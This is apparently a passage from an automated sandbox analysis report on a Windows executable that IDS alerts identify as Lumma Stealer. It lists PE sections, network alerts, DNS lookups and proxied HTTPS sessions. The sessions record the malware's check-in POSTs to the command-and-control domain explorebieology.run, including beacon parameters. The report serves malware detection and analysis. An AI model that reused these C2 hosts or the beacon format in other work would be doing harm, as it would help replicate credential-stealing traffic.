                        0x10000x600000x2e400b666f9b1d72d77d73c3e05f64d38e283False0.9981049408783784OpenPGP Public Key7.980403044384576IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc0x610000x1ac0x200a6c0b70bf165f6b9e4d36c747e8a40f1False0.54296875data5.257512990547039IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .idata 0x620000x10000x200abe4e884b58240d1cb9001d893d0bcb2False0.150390625data1.0437720338377494IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        bxbbqwne0x630000x2b50000x2b4e00271ef5621b2ec5fa3950b5e6cd6dbb52unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        wovautmq0x3180000x10000x400b8916dbfdf6f7da5660095167cb81d78False0.8125data6.3254208358648665IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .taggant0x3190000x30000x2200ab524de27716f2095dd9d48376aaf59fFalse0.07341452205882353DOS executable (COM)0.7503337733344204IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                        Resources

                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        RT_MANIFEST0x610580x152ASCII text, with CRLF line terminators0.6479289940828402

                        Imports

                        DLLImport
                        kernel32.dlllstrcpy

                        Network Behavior

                        Suricata IDS Alerts

                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2025-03-05T09:16:48.550726+01002060538ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gadgethgfub .icu)1192.168.2.4566471.1.1.153UDP
                        2025-03-05T09:16:48.563335+01002060536ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (explorebieology .run)1192.168.2.4561731.1.1.153UDP
                        2025-03-05T09:16:49.071576+01002060537ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI)1192.168.2.449731104.21.31.208443TCP
                        2025-03-05T09:16:49.071576+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731104.21.31.208443TCP
                        2025-03-05T09:16:49.253351+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449731104.21.31.208443TCP
                        2025-03-05T09:16:49.253351+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731104.21.31.208443TCP
                        2025-03-05T09:16:49.825660+01002060537ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI)1192.168.2.449732104.21.31.208443TCP
                        2025-03-05T09:16:49.825660+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732104.21.31.208443TCP
                        2025-03-05T09:16:49.961907+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449732104.21.31.208443TCP
                        2025-03-05T09:16:51.093749+01002060537ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI)1192.168.2.449733104.21.31.208443TCP
                        2025-03-05T09:16:51.093749+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733104.21.31.208443TCP
                        2025-03-05T09:16:51.795991+01002060537ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI)1192.168.2.449734104.21.31.208443TCP
                        2025-03-05T09:16:51.795991+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734104.21.31.208443TCP
                        2025-03-05T09:16:51.907434+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449734104.21.31.208443TCP
                        2025-03-05T09:16:52.438897+01002060537ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI)1192.168.2.449735104.21.31.208443TCP
                        2025-03-05T09:16:52.438897+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449735104.21.31.208443TCP
                        2025-03-05T09:16:56.996140+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449735104.21.31.208443TCP

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Mar 5, 2025 09:16:48.587816000 CET49731443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:48.587867022 CET44349731104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:48.587991953 CET49731443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:48.591399908 CET49731443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:48.591418028 CET44349731104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:49.071463108 CET44349731104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:49.071576118 CET49731443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:49.077682972 CET49731443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:49.077694893 CET44349731104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:49.078021049 CET44349731104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:49.121917963 CET49731443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:49.145376921 CET49731443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:49.145411015 CET49731443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:49.145522118 CET44349731104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:49.253366947 CET44349731104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:49.253418922 CET44349731104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:49.253479004 CET44349731104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:49.253514051 CET44349731104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:49.253524065 CET49731443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:49.253542900 CET44349731104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:49.253595114 CET49731443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:49.253598928 CET44349731104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:49.253657103 CET49731443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:49.255781889 CET49731443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:49.255800962 CET44349731104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:49.255814075 CET49731443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:49.255819082 CET44349731104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:49.343624115 CET49732443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:49.343677998 CET44349732104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:49.343801022 CET49732443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:49.345382929 CET49732443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:49.345403910 CET44349732104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:49.825583935 CET44349732104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:49.825659990 CET49732443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:49.827594995 CET49732443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:49.827604055 CET44349732104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:49.827893019 CET44349732104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:49.829420090 CET49732443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:49.829469919 CET49732443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:49.829499960 CET44349732104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:49.961918116 CET44349732104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:49.961966038 CET44349732104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:49.961997032 CET44349732104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:49.962025881 CET44349732104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:49.962033987 CET49732443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:49.962070942 CET44349732104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:49.962089062 CET49732443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:49.962126970 CET44349732104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:49.965145111 CET49732443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:49.965213060 CET49732443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:49.965235949 CET44349732104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:49.965246916 CET49732443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:49.965253115 CET44349732104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:50.620330095 CET49733443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:50.620376110 CET44349733104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:50.620461941 CET49733443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:50.620809078 CET49733443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:50.620820045 CET44349733104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:51.093683004 CET44349733104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:51.093749046 CET49733443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:51.095609903 CET49733443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:51.095623016 CET44349733104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:51.095889091 CET44349733104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:51.097181082 CET49733443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:51.097281933 CET49733443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:51.097305059 CET44349733104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:51.199265003 CET44349733104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:51.199321032 CET44349733104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:51.199376106 CET44349733104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:51.199404001 CET44349733104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:51.199424982 CET49733443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:51.199455023 CET44349733104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:51.199486017 CET49733443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:51.199501038 CET44349733104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:51.199538946 CET49733443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:51.199696064 CET49733443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:51.323535919 CET49734443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:51.323585987 CET44349734104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:51.323683023 CET49734443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:51.324043036 CET49734443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:51.324057102 CET44349734104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:51.795912027 CET44349734104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:51.795990944 CET49734443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:51.798655033 CET49734443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:51.798666000 CET44349734104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:51.798918962 CET44349734104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:51.800916910 CET49734443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:51.801083088 CET49734443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:51.801089048 CET44349734104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:51.907457113 CET44349734104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:51.907512903 CET44349734104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:51.907547951 CET44349734104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:51.907582998 CET44349734104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:51.907582045 CET49734443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:51.907603025 CET44349734104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:51.907618046 CET49734443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:51.907681942 CET44349734104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:51.907818079 CET49734443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:51.907836914 CET49734443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:51.936491013 CET49735443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:51.936537027 CET44349735104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:51.936691999 CET49735443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:51.937098026 CET49735443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:51.937110901 CET44349735104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:52.438612938 CET44349735104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:52.438896894 CET49735443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:52.440176964 CET49735443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:52.440188885 CET44349735104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:52.440447092 CET44349735104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:52.441807032 CET49735443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:52.441831112 CET49735443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:52.441880941 CET44349735104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:56.996140003 CET44349735104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:56.996244907 CET44349735104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:56.996325016 CET49735443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:56.996643066 CET49735443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:56.996668100 CET44349735104.21.31.208192.168.2.4
                        Mar 5, 2025 09:16:56.996685982 CET49735443192.168.2.4104.21.31.208
                        Mar 5, 2025 09:16:56.996691942 CET44349735104.21.31.208192.168.2.4

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Mar 5, 2025 09:16:48.550725937 CET5664753192.168.2.41.1.1.1
                        Mar 5, 2025 09:16:48.559578896 CET53566471.1.1.1192.168.2.4
                        Mar 5, 2025 09:16:48.563334942 CET5617353192.168.2.41.1.1.1
                        Mar 5, 2025 09:16:48.582007885 CET53561731.1.1.1192.168.2.4

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Mar 5, 2025 09:16:48.550725937 CET192.168.2.41.1.1.10x4d66Standard query (0)gadgethgfub.icuA (IP address)IN (0x0001)false
                        Mar 5, 2025 09:16:48.563334942 CET192.168.2.41.1.1.10xacb0Standard query (0)explorebieology.runA (IP address)IN (0x0001)false

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Mar 5, 2025 09:16:48.559578896 CET1.1.1.1192.168.2.40x4d66Name error (3)gadgethgfub.icunonenoneA (IP address)IN (0x0001)false
                        Mar 5, 2025 09:16:48.582007885 CET1.1.1.1192.168.2.40xacb0No error (0)explorebieology.run104.21.31.208A (IP address)IN (0x0001)false
                        Mar 5, 2025 09:16:48.582007885 CET1.1.1.1192.168.2.40xacb0No error (0)explorebieology.run172.67.179.246A (IP address)IN (0x0001)false

                        HTTP Request Dependency Graph

                        • explorebieology.run

                        HTTPS Proxied Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.449731104.21.31.2084437468C:\Users\user\Desktop\random(3).exe
                        TimestampBytes transferredDirectionData
                        2025-03-05 08:16:49 UTC266OUTPOST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: explorebieology.run
                        2025-03-05 08:16:49 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                        Data Ascii: act=life
                        2025-03-05 08:16:49 UTC200INHTTP/1.1 403 Forbidden
                        Date: Wed, 05 Mar 2025 08:16:49 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Server: cloudflare
                        CF-RAY: 91b82c637e5b4340-EWR
                        2025-03-05 08:16:49 UTC1169INData Raw: 31 31 37 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                        Data Ascii: 1176<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                        2025-03-05 08:16:49 UTC1369INData Raw: 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66
                        Data Ascii: d><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf
                        2025-03-05 08:16:49 UTC1369INData Raw: 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20
                        Data Ascii: 0.1.1-/api"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p>
                        2025-03-05 08:16:49 UTC571INData Raw: 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 64 28 29 7b 76 61 72 20 62 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69
                        Data Ascii: >(function(){function d(){var b=a.getElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-i
                        2025-03-05 08:16:49 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        1192.168.2.449732104.21.31.2084437468C:\Users\user\Desktop\random(3).exe
                        TimestampBytes transferredDirectionData
                        2025-03-05 08:16:49 UTC364OUTPOST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        Cookie: __cf_mw_byp=btftl_ryNDDPEjPOe8h.lFWa37zBj0raEj9lH67Dfn0-1741162609.1950147-0.0.1.1-/api
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 55
                        Host: explorebieology.run
                        2025-03-05 08:16:49 UTC55OUTData Raw: 61 63 74 3d 72 65 63 65 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 31 76 4a 49 76 6b 2d 2d 6d 69 78 2d 6c 61 62 73 2d 32 30 6b 26 6a 3d
                        Data Ascii: act=receive_message&ver=4.0&lid=1vJIvk--mix-labs-20k&j=
                        2025-03-05 08:16:49 UTC564INHTTP/1.1 403 Forbidden
                        Date: Wed, 05 Mar 2025 08:16:49 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        X-Frame-Options: SAMEORIGIN
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pQfy1LdxvUTyiUbDp2E9z0V9d31ShChakR%2F1Le9oK0po3aR7NOJyAkXtXDWQoI9iv2k%2FPcLvKRp%2FFzCucfDMQUIP%2Bosw4tXskrnDP%2BPX4ANQRZ%2FFRrHZVhmO5N8oRdU%2FDQ1nOCBm"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 91b82c67e9574b06-EWR
                        2025-03-05 08:16:49 UTC805INData Raw: 31 31 63 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                        Data Ascii: 11c4<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                        2025-03-05 08:16:49 UTC1369INData Raw: 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d
                        Data Ascii: n-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElem
                        2025-03-05 08:16:49 UTC1369INData Raw: 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72
                        Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <for
